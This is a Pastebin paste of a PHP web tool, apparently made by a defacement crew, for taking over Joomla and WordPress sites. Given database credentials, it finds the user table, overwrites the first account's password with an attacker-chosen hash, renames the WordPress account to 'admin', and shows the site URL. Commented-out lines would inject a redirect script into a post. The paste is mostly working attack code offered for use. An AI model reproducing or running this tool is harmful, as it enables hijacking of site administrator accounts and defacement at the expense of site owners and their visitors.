Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
- "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <title>Exploit query 2011 #</title>
- </head>
- <style type="text/css">
- body{
- background: #333333;
- color: #fff;
- font-family: Consolas;
- font-size: 13px;
- }
- .text {
- background: #fff;
- color: #000;
- }
- .text:hover {
- background: #FFFFCC;
- }
- .submit {
- background: #333330;
- padding: 2px;
- margin: 0px;
- color: #fff;
- border: thick;
- }
- .submit:hover {
- background: #555;
- }
- </style>
- <body>
- <center><h2># Mysql Query #</h2>
- <form action="" method="post">
- host : <input type="text" value="localhost" name="localhost" class="text" />
- db : <input type="text" name="db" class="text" /><br />
- user : <input type="text" name="userdb" class="text" /> pass : <input type="text" name="passdb" class="text" /><br /> <br />What password ! : <input type="text" name="mdpass" class="text" /><br />
- joomla : <input type="radio" value="1" name="ch1" /> wordpress: <input type="radio" value="2" name="ch1" /> <br /> <br />
- <input type="submit" name ="go" value="#- Done -#" class="submit" />
- </form>
- </center>
- <?
- $host = $_POST['locch1alhost'];
- $dbname = $_POST['db'];
- $dbuser = $_POST['userdb'];
- $dbpass = $_POST['passdb'];
- $kolk = md5($_POST['mdpass']);
- if ($_POST['ch1'] == 1) {
- $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database");
- $selectdb = mysql_select_db($dbname,$connect);
- $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_schema) from information_schema.columns where column_name LIKE "%pas%"');
- $show = mysql_fetch_array($cyber);
- $defg = $show[0];
- $imp = explode(':',$defg);
- $ar = $imp[0];
- $conar = mysql_query("SELECT * FROM $ar");
- $showar = mysql_fetch_array($conar);
- ################# set
- $setar = mysql_query("UPDATE $ar SET password='".$kolk."' WHERE id = '".$showar[0]."' ");
- echo $setar;
- echo "user name is -> $showar[2]";
- } else if ($_POST['ch1'] == '2') {
- $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database");
- $selectdb = mysql_select_db($dbname,$connect);
- $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_schema) from information_schema.columns where column_name LIKE "%user_pass%"');
- $show = mysql_fetch_array($cyber);
- $defg = $show[0];
- $imp = explode(':',$defg);
- $ar = $imp[0];
- $conar = mysql_query("SELECT * FROM $ar");
- $showar = mysql_fetch_array($conar);
- ################# set
- $setar = mysql_query("UPDATE $ar SET user_pass='".$kolk."' WHERE id = '".$showar[0]."' ");
- $setar .= mysql_query("UPDATE $ar SET user_login='admin' WHERE id = '".$showar[0]."' ");
- echo $setar;
- echo "user name is -> $showar[1]"."<br />";
- #$qurl = mysql_query("select guid from wp_posts");
- #$scr = "<script>document.location='http://zonehmirrors.net/defaced/2011/10/07/ecocolourchembd.com'</script>";
- #$indq = mysql_query('UPDATE wp_posts SET post_title="'.$scr.'" WHERE id =1');
- #$indexar = mysql_fetch_array($indq);
- #$qin = mysql_query("select post_title from wp_posts where id =1");
- #$rqin = mysql_fetch_array($qin);
- # echo htmlspecialchars("$rqin[0]");
- $q = mysql_query("select * from wp_options where option_id='1' or option_name='home'");
- while($wos = mysql_fetch_object($q)){
- if ($wos){
- echo "URL : ~> ".$wos->option_value."<br>";
- }}
- }
- ?>
- </body>
- <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
- <center><b>Meked By Cyber-Crystal </b></center>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement